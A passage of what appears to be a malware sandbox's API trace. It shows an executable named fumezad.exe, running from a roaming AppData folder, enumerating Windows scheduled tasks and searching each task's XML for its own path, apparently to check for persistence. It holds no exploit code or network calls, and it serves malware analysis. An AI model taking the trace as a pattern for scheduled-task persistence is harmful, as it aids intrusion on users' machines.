$(@%systemroot%\\system32\\cscui.dll,-5002)\r\n \r\n \r\n \r\n true\r\n PT4M\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n LeastPrivilege\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n false\r\n P1D\r\n \r\n \r\n \r\n {FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.088] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.088] IUnknown:Release (This=0x126f40) returned 0x0 [0138.088] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.089] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.089] IUnknown:Release (This=0x126f40) returned 0x0 [0138.090] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.090] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x15, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.090] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.091] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.091] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127090) returned 0x0 [0138.091] IRegisteredTask:get_Name (in: This=0x127090, pName=0x24da80 | out: pName=0x24da80*="BackgroundConfigSurveyor") returned 0x0 [0138.091] IRegisteredTask:get_Xml (in: This=0x127090, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n") returned 0x0 [0138.094] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2003)\r\n $(@%systemRoot%\\System32\\perftrack.dll,-2002)\r\n Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor\r\n \r\n \r\n \r\n \r\n 2008-05-30T03:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {EA9155A3-8A39-40b4-8963-D3C761B18371}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.094] IUnknown:Release (This=0x127090) returned 0x0 [0138.094] IUnknown:Release (This=0x126f40) returned 0x0 [0138.094] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.095] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.095] IUnknown:Release (This=0x126f40) returned 0x0 [0138.095] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.095] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.095] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.096] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0138.096] IUnknown:Release (This=0x126f30) returned 0x0 [0138.096] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.098] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=1) returned 0x0 [0138.098] ITaskFolderCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24da60 | out: ppFolder=0x24da60*=0x127080) returned 0x0 [0138.098] ITaskFolder:GetTasks (in: This=0x127080, flags=1, ppTasks=0x24d8e0 | out: ppTasks=0x24d8e0*=0x127120) returned 0x0 [0138.099] IRegisteredTaskCollection:get_Count (in: This=0x127120, pCount=0x24da40 | out: pCount=0x24da40*=0) returned 0x0 [0138.099] IUnknown:Release (This=0x127120) returned 0x0 [0138.099] ITaskFolder:GetFolders (in: This=0x127080, flags=0, ppFolders=0x24d8e8 | out: ppFolders=0x24d8e8*=0x127120) returned 0x0 [0138.100] ITaskFolderCollection:get_Count (in: This=0x127120, pCount=0x24da58 | out: pCount=0x24da58*=0) returned 0x0 [0138.100] IUnknown:Release (This=0x127120) returned 0x0 [0138.100] TaskScheduler:IUnknown:Release (This=0x127080) returned 0x0 [0138.100] IUnknown:Release (This=0x126f30) returned 0x0 [0138.100] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.100] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.100] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f60) returned 0x0 [0138.102] IRegisteredTaskCollection:get_Count (in: This=0x126f60, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.102] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0138.102] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="AnalyzeSystem") returned 0x0 [0138.102] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n") returned 0x0 [0138.104] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n $(@%systemRoot%\\system32\\energy.dll,-101)\r\n $(@%systemRoot%\\system32\\energy.dll,-103)\r\n $(@%systemRoot%\\system32\\energy.dll,-102)\r\n 1.0\r\n \r\n \r\n \r\n 2008-01-01T06:00:00\r\n PT8H\r\n \r\n 14\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n PT5M\r\n PT2H\r\n false\r\n false\r\n \r\n true\r\n true\r\n PT5M\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\powercfg.exe\r\n -energy -auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.104] IUnknown:Release (This=0x1270d0) returned 0x0 [0138.104] IUnknown:Release (This=0x126f60) returned 0x0 [0138.104] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f60) returned 0x0 [0138.105] ITaskFolderCollection:get_Count (in: This=0x126f60, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.105] IUnknown:Release (This=0x126f60) returned 0x0 [0138.105] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.105] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x18, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.105] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.107] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.107] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127070) returned 0x0 [0138.107] IRegisteredTask:get_Name (in: This=0x127070, pName=0x24da80 | out: pName=0x24da80*="RacTask") returned 0x0 [0138.107] IRegisteredTask:get_Xml (in: This=0x127070, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n") returned 0x0 [0138.117] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-501)\r\n $(@%SystemRoot%\\system32\\RacEngn.dll,-502)\r\n Microsoft\\Windows\\RAC\\RacTask\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n PT1H\r\n false\r\n \r\n 2008-03-31T00:00:00Z\r\n true\r\n PT15M\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n PT0S\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {42060D27-CA53-41f5-96E4-B1E8169308A6}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.118] IUnknown:Release (This=0x127070) returned 0x0 [0138.118] IUnknown:Release (This=0x126f30) returned 0x0 [0138.118] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.120] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.120] IUnknown:Release (This=0x126f30) returned 0x0 [0138.120] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.120] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.120] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.122] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.122] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127070) returned 0x0 [0138.122] IRegisteredTask:get_Name (in: This=0x127070, pName=0x24da80 | out: pName=0x24da80*="MobilityManager") returned 0x0 [0138.122] IRegisteredTask:get_Xml (in: This=0x127070, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n") returned 0x0 [0138.124] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Ras\\MobilityManager\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"Application\"\r\n >\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n {c463a0fc-794f-4fdf-9201-01938ceacafa}\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.124] IUnknown:Release (This=0x127070) returned 0x0 [0138.124] IUnknown:Release (This=0x126f30) returned 0x0 [0138.124] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.128] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.128] IUnknown:Release (This=0x126f30) returned 0x0 [0138.128] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.128] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1a, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.129] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.130] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.130] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.130] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="RegIdleBackup") returned 0x0 [0138.130] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n") returned 0x0 [0138.133] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n Microsoft\\Windows\\Registry\\RegIdleBackup\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n \r\n 2008-01-01T00:00:00\r\n \r\n 10\r\n \r\n PT1H\r\n \r\n \r\n \r\n true\r\n IgnoreNew\r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n false\r\n true\r\n 5\r\n true\r\n true\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {ca767aa8-9157-4604-b64b-40747123d5f2}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.133] IUnknown:Release (This=0x127080) returned 0x0 [0138.133] IUnknown:Release (This=0x126f30) returned 0x0 [0138.133] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.134] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.134] IUnknown:Release (This=0x126f30) returned 0x0 [0138.134] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.134] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.134] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f70) returned 0x0 [0138.135] IRegisteredTaskCollection:get_Count (in: This=0x126f70, pCount=0x24dbd0 | out: pCount=0x24dbd0*=0) returned 0x0 [0138.135] IUnknown:Release (This=0x126f70) returned 0x0 [0138.135] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f70) returned 0x0 [0138.136] ITaskFolderCollection:get_Count (in: This=0x126f70, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.136] IUnknown:Release (This=0x126f70) returned 0x0 [0138.136] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.137] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.137] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.138] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.138] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.138] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="RemoteAssistanceTask") returned 0x0 [0138.138] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0138.141] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n PT15S\r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Queue\r\n false\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.141] IUnknown:Release (This=0x1270a0) returned 0x0 [0138.141] IUnknown:Release (This=0x126f40) returned 0x0 [0138.141] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f40) returned 0x0 [0138.142] ITaskFolderCollection:get_Count (in: This=0x126f40, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.142] IUnknown:Release (This=0x126f40) returned 0x0 [0138.142] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.142] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.142] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.145] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.145] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.145] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="WindowsParentalControls") returned 0x0 [0138.145] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n") returned 0x0 [0138.147] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Shell\\WindowsParentalControls\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-300)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-301)\r\n $(@%SystemRoot%\\System32\\wpcumi.dll,-302)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \r\n \r\n \r\n false\r\n PT1S\r\n \r\n \r\n \r\n true\r\n \r\n false\r\n false\r\n \r\n false\r\n true\r\n Parallel\r\n false\r\n false\r\n true\r\n true\r\n false\r\n PT0S\r\n false\r\n true\r\n http://schemas.microsoft.com/windows/2004/02/mit/task\r\n \r\n PT1M\r\n 5\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n {DFA14C43-F385-4170-99CC-1B7765FA0E4A}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.147] IUnknown:Release (This=0x127080) returned 0x0 [0138.147] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0138.147] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="WindowsParentalControlsMigration") returned 0x0 [0138.147] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: 